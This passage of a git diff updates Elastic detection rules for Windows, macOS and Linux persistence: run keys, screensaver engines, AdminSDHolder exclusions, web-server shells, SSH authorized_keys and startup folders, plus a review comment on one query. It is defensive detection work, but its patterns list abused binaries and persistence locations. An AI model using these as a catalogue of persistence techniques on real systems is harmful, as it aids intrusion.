\"?:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\") and\n not (process.name : \"OneDriveSetup.exe\" and\n registry.value : (\"Delete Cached Standalone Update Binary\", \"Delete Cached Update Binary\", \"amd64\", \"Uninstall *\") and\n registry.data.strings : \"?:\\\\Windows\\\\system32\\\\cmd.exe /q /c * 
\\\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\*\\\"\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.value", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "97fc44d3-8dae-4019-ae83-298c3015600f", "severity": "low", @@ -49,5 +81,5 @@ "timeline_title": "Comprehensive Registry Timeline", "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json index 2c5b42fba5fa3..4b9ff210d2bfc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_runtime_run_key_startup_susp_procs.json 
@@ -13,6 +13,43 @@
 "license": "Elastic License v2",
 "name": "Execution of Persistent Suspicious Program",
 "query": "/* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */\nsequence by host.id, user.name with maxspan=1m\n [process where event.type in (\"start\", \"process_started\") and process.name : \"userinit.exe\" and process.parent.name : \"winlogon.exe\"]\n [process where event.type in (\"start\", \"process_started\") and process.name : \"explorer.exe\"]\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"explorer.exe\" and\n /* add suspicious programs here */\n process.pe.original_file_name in (\"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"RegAsm.exe\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\") and\n /* add potential suspicious paths here */\n process.args : (\"C:\\\\Users\\\\*\", \"C:\\\\ProgramData\\\\*\", \"C:\\\\Windows\\\\Temp\\\\*\", \"C:\\\\Windows\\\\Tasks\\\\*\", \"C:\\\\PerfLogs\\\\*\", \"C:\\\\Intel\\\\*\")\n ]\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a",
 "severity": "medium",
@@ -48,5 +85,5 @@
 }
 ],
 "type": "eql",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json
index 4177569159cb7..da4a6c0bebc4d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_engine_unexpected_child_process.json
@@ -11,14 +11,27 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Unexpected Child Process of macOS Screensaver Engine",
- "note": "## Triage and analysis\n\n- Analyze the descendant processes of the ScreenSaverEngine process for malicious code and suspicious behavior such\nas a download of a payload from a server.\n- Review the installed and activated screensaver on the host. Triage the screensaver (.saver) file that was triggered to\nidentify whether the file is malicious or not.\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "## Triage and analysis\n\n- Analyze the descendant processes of the ScreenSaverEngine process for malicious code and suspicious behavior such\nas a download of a payload from a server.\n- Review the installed and activated screensaver on the host. Triage the screensaver (.saver) file that was triggered to\nidentify whether the file is malicious or not.",
 "query": "process where event.type == \"start\" and process.parent.name == \"ScreenSaverEngine\"\n",
 "references": [
 "https://posts.specterops.io/saving-your-access-d562bf5bf90b",
 "https://github.com/D00MFist/PersistentJXA"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "48d7f54d-c29e-4430-93a9-9db6b5892270",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -39,12 +52,19 @@
 {
 "id": "T1546",
 "name": "Event Triggered Execution",
- "reference": "https://attack.mitre.org/techniques/T1546/"
+ "reference": "https://attack.mitre.org/techniques/T1546/",
+ "subtechnique": [
+ {
+ "id": "T1546.002",
+ "name": "Screensaver",
+ "reference": "https://attack.mitre.org/techniques/T1546/002/"
+ }
+ ]
 }
 ]
 }
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json
index 850014c75a7e7..2cc5f2e166f0c 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_screensaver_plist_file_modification.json
@@ -11,14 +11,37 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Screensaver Plist File Modified by Unexpected Process",
- "note": "## Triage and analysis\n\n- Analyze the plist file modification event to identify whether the change was expected or not\n- Investigate the process that modified the plist file for malicious code or other suspicious behavior\n- Identify if any suspicious or known malicious screensaver (.saver) files were recently written to or modified on the host\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "## Triage and analysis\n\n- Analyze the plist file modification event to identify whether the change was expected or not\n- Investigate the process that modified the plist file for malicious code or other suspicious behavior\n- Identify if any suspicious or known malicious screensaver (.saver) files were recently written to or modified on the host",
 "query": "file where event.type != \"deletion\" and\n file.name: \"com.apple.screensaver.*.plist\" and\n file.path : (\n \"/Users/*/Library/Preferences/ByHost/*\",\n \"/Library/Managed Preferences/*\",\n \"/System/Library/Preferences/*\"\n ) and\n /* Filter OS processes modifying screensaver plist files */\n not process.executable : (\n \"/usr/sbin/cfprefsd\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/Resources/MCXCompositor\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/MacOS/ManagedClient\"\n )\n",
 "references": [
 "https://posts.specterops.io/saving-your-access-d562bf5bf90b",
 "https://github.com/D00MFist/PersistentJXA"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.path",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.executable",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -46,5 +69,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 2
+ "version": 4
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json
index 3768eeed0e57a..08527201b62f4 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_sdprop_exclusion_dsheuristics.json
@@ -11,14 +11,37 @@ "language": "eql", "license": "Elastic License v2", "name": "AdminSDHolder SDProp Exclusion Added", - "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. If the\npermissions on any of the protected accounts and groups do not match, it resets the permissions on the protected\naccounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is\nused to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the\n16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n* For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character\nis set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the\nexcluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high\nprivileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range 
from 0 to f (15). If more than one group is specified, the values will be summed together;\n for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. Any potential benign true positive (B-TP)\nshould be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating AdminSDHolder SDProp Exclusion Added\n\nThe SDProp process compares the permissions on protected objects with those defined on the AdminSDHolder object. 
If the\npermissions on any of the protected accounts and groups do not match, it resets the permissions on the protected\naccounts and groups to match those defined in the domain AdminSDHolder object.\n\nThe dSHeuristics is a Unicode string attribute, in which each character in the string represents a heuristic that is\nused to determine the behavior of Active Directory.\n\nAdministrators can use the dSHeuristics attribute to exclude privilege groups from the SDProp process by setting the\n16th bit (dwAdminSDExMask) of the string to a certain value, which represents the group(s):\n\n* For example, to exclude the Account Operators group, an administrator would modify the string, so the 16th character\nis set to 1 (i.e., 0000000001000001).\n\nThe usage of this exclusion can leave the accounts unprotected and facilitate the misconfiguration of privileges for the\nexcluded groups, enabling attackers to add accounts to these groups to maintain long-term persistence with high\nprivileges.\n\nThis rule matches changes of the dsHeuristics object where the 16th bit is set to a value other than zero.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check the value assigned to the 16th bit of the string on the `winlog.event_data.AttributeValue` field:\n - Account Operators eq 1\n - Server Operators eq 2\n - Print Operators eq 4\n - Backup Operators eq 8\n The field value can range from 0 to f (15). If more than one group is specified, the values will be summed together;\n for example, Backup Operators and Print Operators will set the `c` value on the bit.\n\n### False positive analysis\n\n- While this modification can be done legitimately, it is not a best practice. 
Any potential benign true positive (B-TP)\nshould be mapped and reviewed by the security team for alternatives as this weakens the security of the privileged group.\n\n### Response and remediation\n\n- The change can be reverted by setting the dwAdminSDExMask (16th bit) to 0 in dSHeuristics.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "any where event.action == \"Directory Service Changes\" and\n event.code == \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName : \"dSHeuristics\" and\n length(winlog.event_data.AttributeValue) > 15 and\n winlog.event_data.AttributeValue regex~ \"[0-9]{15}([1-9a-f]).*\"\n", "references": [ "https://www.cert.ssi.gouv.fr/uploads/guide-ad.html#dsheuristics_bad", "https://petri.com/active-directory-security-understanding-adminsdholder-object" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "61d29caf-6c15-4d1e-9ccb-7ad12ccc0bc7", + "setup": "The 'Audit Directory Service Changes' logging policy must be configured for (Success).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success)\n```\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this 
rule to work.", "severity": "high", "tags": [ "Elastic", @@ -41,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json index c44e78f95845d..bede213815a05 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_services_registry.json 
@@ -11,6 +11,28 @@ "license": "Elastic License v2", "name": "Unusual Persistence via Services Registry", "query": "registry where registry.path : (\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ServiceDLL\", \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Services\\\\*\\\\ImagePath\") and\n not registry.data.strings : (\"?:\\\\windows\\\\system32\\\\Drivers\\\\*.sys\",\n \"\\\\SystemRoot\\\\System32\\\\drivers\\\\*.sys\",\n \"\\\\??\\\\?:\\\\Windows\\\\system32\\\\Drivers\\\\*.SYS\",\n \"system32\\\\DRIVERS\\\\USBSTOR\") and\n not (process.name : \"procexp??.exe\" and registry.data.strings : \"?:\\\\*\\\\procexp*.sys\") and\n not process.executable : (\"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\winsxs\\\\*\\\\TiWorker.exe\",\n \"?:\\\\Windows\\\\System32\\\\drvinst.exe\",\n \"?:\\\\Windows\\\\System32\\\\services.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\regsvr32.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "403ef0d3-8259-40c9-a5b6-d48354712e49", "severity": "low", @@ -47,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json index eec7157c74148..60fc7d54b06a4 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_activity_by_web_server.json @@ -14,10 +14,32 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Shell via Web Server", - "query": "event.category:process and event.type:(start or process_started) and process.name:(bash or dash) and\n user.name:(apache or nginx or www or \"www-data\")\n", + "query": "event.category:process and event.type:(start or process_started) and\nprocess.name:(bash or dash or ash or zsh or \"python*\" or \"perl*\" or \"php*\") and\nprocess.parent.name:(\"apache\" or \"nginx\" or \"www\" or \"apache2\" or \"httpd\" or \"www-data\")\n", "references": [ "https://pentestlab.blog/tag/web-shell/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "231876e7-4d1f-4d63-a47c-47dd1acdc1cb", "severity": "medium", @@ -54,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json index 680934896128c..68781de47f191 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_shell_profile_modification.json 
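Review bot: The new `process.parent.name` list on the added `"query"` line still contains `"www-data"`, which in the removed query was a `user.name` value rather than a process name; as a parent-process name it is unlikely to ever match, so it should either be dropped or the account-based condition kept alongside the new one, e.g. `process.parent.name:("apache" or "nginx" or "www" or "apache2" or "httpd") or user.name:(apache or nginx or www or "www-data")`. Replacing `user.name` with `process.parent.name` also means shells spawned by worker processes that are not in the list (for example `php-fpm`) no longer fire, while a shell spawned by any of the listed parents now fires regardless of the account it runs under; if that narrowing and broadening is intended, the rule's note and false-positive guidance (outside this hunk) should say so. The `required_fields` block correctly no longer lists `user.name`, so whichever way this goes it needs to stay in sync with the query.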
@@ -18,6 +18,33 @@ "references": [ "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e6c1a552-7776-44ad-ae0f-8746cc07773c", "severity": "medium", @@ -55,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json index fc49e19895101..ce7e7dd280eb9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_ssh_authorized_keys_modification.json 
@@ -12,6 +12,28 @@ "license": "Elastic License v2", "name": "SSH Authorized Keys File Modification", "query": "event.category:file and event.type:(change or creation) and \n file.name:(\"authorized_keys\" or \"authorized_keys2\") and \n not process.executable:\n (/Library/Developer/CommandLineTools/usr/bin/git or \n /usr/local/Cellar/maven/*/libexec/bin/mvn or \n /Library/Java/JavaVirtualMachines/jdk*.jdk/Contents/Home/bin/java or \n /usr/bin/vim or \n /usr/local/Cellar/coreutils/*/bin/gcat or \n /usr/bin/bsdtar or\n /usr/bin/nautilus or \n /usr/bin/scp or\n /usr/bin/touch or \n /var/lib/docker/* or\n /usr/bin/google_guest_agent)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f", "severity": "medium", @@ -49,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json index 4726af49b501f..e572135fbf3ff 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_startup_folder_file_written_by_suspicious_process.json 
@@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Startup Persistence by a Suspicious Process", - "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation, \nverify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and\n user.domain != \"NT AUTHORITY\" and\n file.path : (\"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\*\", \n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\*\") and\n process.name : (\"cmd.exe\",\n \"powershell.exe\",\n \"wmic.exe\",\n \"mshta.exe\",\n \"pwsh.exe\",\n \"cscript.exe\",\n \"wscript.exe\",\n \"regsvr32.exe\",\n \"RegAsm.exe\",\n \"rundll32.exe\",\n \"EQNEDT32.EXE\",\n \"WINWORD.EXE\",\n \"EXCEL.EXE\",\n \"POWERPNT.EXE\",\n \"MSPUB.EXE\",\n \"MSACCESS.EXE\",\n \"iexplore.exe\",\n \"InstallUtil.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Startup Persistence by a Suspicious Process\n\nThe Windows Startup folder is a special folder in Windows. Programs added to this folder are executed during account\nlogon, without user interaction, providing an excellent way for attackers to maintain persistence.\n\nThis rule monitors for commonly abused processes writing to the Startup folder locations.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Retrieve the file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- Administrators may add programs to this mechanism via command-line shells. 
Before the further investigation,\nverify that this activity is not benign.\n\n### Related rules\n\n- Suspicious Startup Shell Folder Modification - c8b150f0-0164-475b-a75e-74b47800a9ff\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
